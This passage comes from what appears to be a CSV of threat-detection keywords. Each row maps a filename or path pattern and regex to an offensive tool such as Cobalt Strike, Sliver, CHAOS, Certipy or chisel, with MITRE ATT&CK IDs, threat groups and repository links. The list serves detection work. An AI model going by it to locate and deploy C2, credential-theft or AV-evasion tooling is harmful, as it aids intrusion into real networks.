Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*/C2concealer*",".{0,1000}\/C2concealer.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/c2endpoint.php*",".{0,1000}\/c2endpoint\.php.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/C2Frame.*",".{0,1000}\/C2Frame\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/C2Manager.cs*",".{0,1000}\/C2Manager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/c2profile.*",".{0,1000}\/c2profile\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/c2profile.go*",".{0,1000}\/c2profile\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/C2Profiles/*",".{0,1000}\/C2Profiles\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/C2ReverseProxy.git*",".{0,1000}\/C2ReverseProxy\.git.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2ReverseProxy/*",".{0,1000}\/C2ReverseProxy\/.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2ReverseProxy/tarball*",".{0,1000}\/C2ReverseProxy\/tarball.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2ReverseProxy/zipball*",".{0,1000}\/C2ReverseProxy\/zipball.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2ReverseServer*",".{0,1000}\/C2ReverseServer.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2script/*",".{0,1000}\/C2script\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2Server.py*",".{0,1000}\/C2Server\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/C2-Tool-Collection/*",".{0,1000}\/C2\-Tool\-Collection\/.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*/cain.html*",".{0,1000}\/cain\.html.{0,1000}","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","9","885","266","2023-09-28T15:38:54Z","2021-05-11T12:38:17Z" "*/CamHacker-*.png*",".{0,1000}\/CamHacker\-.{0,1000}\.png.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/CamHacker.git*",".{0,1000}\/CamHacker\.git.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/campaign/*/implant/get_all*",".{0,1000}\/campaign\/.{0,1000}\/implant\/get_all.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/canary.go",".{0,1000}\/canary\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/CandyPotato.cpp*",".{0,1000}\/CandyPotato\.cpp.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.sdf*",".{0,1000}\/CandyPotato\.sdf.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.sln*",".{0,1000}\/CandyPotato\.sln.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.vcxproj*",".{0,1000}\/CandyPotato\.vcxproj.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CapBypass.ps1*",".{0,1000}\/CapBypass\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*/carlosevieira/Dirty-Pipe*",".{0,1000}\/carlosevieira\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*/cassandra-brute.nse*",".{0,1000}\/cassandra\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cassandra-info.nse*",".{0,1000}\/cassandra\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/catspin.git*",".{0,1000}\/catspin\.git.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*/catspin-main/*",".{0,1000}\/catspin\-main\/.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*/cc2_frp.*",".{0,1000}\/cc2_frp\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/cccam-version.nse*",".{0,1000}\/cccam\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ccmpwn.git*",".{0,1000}\/ccmpwn\.git.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*/ccmpwn.py*",".{0,1000}\/ccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*/CCob/Volumiser*",".{0,1000}\/CCob\/Volumiser.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*/CelestialSpark.git*",".{0,1000}\/CelestialSpark\.git.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*/cerbrutus*",".{0,1000}\/cerbrutus.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","4","330","48","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" "*/Certipy.git*",".{0,1000}\/Certipy\.git.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*/Certipy/*",".{0,1000}\/Certipy\/.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*/CertStealer*",".{0,1000}\/CertStealer.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","464","69","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*/certsync.git*",".{0,1000}\/certsync\.git.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*/cfn__resource_injection_lambda*",".{0,1000}\/cfn__resource_injection_lambda.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/ChainBuilder.py*",".{0,1000}\/ChainBuilder\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/Chakra.dll*",".{0,1000}\/Chakra\.dll.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*/CHAOS.git*",".{0,1000}\/CHAOS\.git.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*/CHAOS-5.0.1.zip*",".{0,1000}\/CHAOS\-5\.0\.1\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*/chaos-container:/database/*",".{0,1000}\/chaos\-container\:\/database\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*/charlotte.cpp*",".{0,1000}\/charlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*/charlotte.py*",".{0,1000}\/charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*/CheckPort.exe*",".{0,1000}\/CheckPort\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*/CheeseTools.git*",".{0,1000}\/CheeseTools\.git.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*/cheetah.git*",".{0,1000}\/cheetah\.git.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*/cheetah.py*",".{0,1000}\/cheetah\.py.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*/Chimera.git*",".{0,1000}\/Chimera\.git.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/chimera.py*",".{0,1000}\/chimera\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*/chimera.sh*",".{0,1000}\/chimera\.sh.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/chisel.exe*",".{0,1000}\/chisel\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel.git*",".{0,1000}\/chisel\.git.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 